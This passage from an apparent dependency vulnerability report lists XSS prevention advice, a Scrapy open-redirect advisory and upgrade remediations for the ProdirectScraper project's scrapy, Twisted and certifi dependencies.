The following environments are susceptible to an XSS attack:
- Web servers
- Application servers
- Web application environments
How to prevent
This section describes the top best practices designed to specifically protect your code:
- Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
- Convert special characters such as
?
,&
,/
,<
,>
and spaces to their respective HTML or URL encoded equivalents. - Give users the option to disable client-side scripts.
- Redirect invalid requests.
- Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
- Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
- Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.
Remediation
Upgrade Twisted
to version 24.7.0rc1 or higher.
References
medium severity
- Vulnerable module: scrapy
- Introduced through: scrapy@1.8.2
Detailed paths
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2Remediation: Upgrade to scrapy@2.11.2.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to URL Redirection to Untrusted Site ('Open Redirect') due to the improper handling of scheme-specific proxy settings during HTTP redirects. An attacker can potentially intercept sensitive information by exploiting the failure to switch proxies when redirected from HTTP to HTTPS URLs or vice versa.
Remediation
Upgrade Scrapy
to version 2.11.2 or higher.
References
medium severity
new
- Module: certifi
- Introduced through: scrapy@1.8.2
Detailed paths
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › tldextract@4.0.0 › requests@2.31.0 › certifi@2025.1.31
-
Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › tldextract@4.0.0 › requests-file@2.1.0 › requests@2.31.0 › certifi@2025.1.31
MPL-2.0 license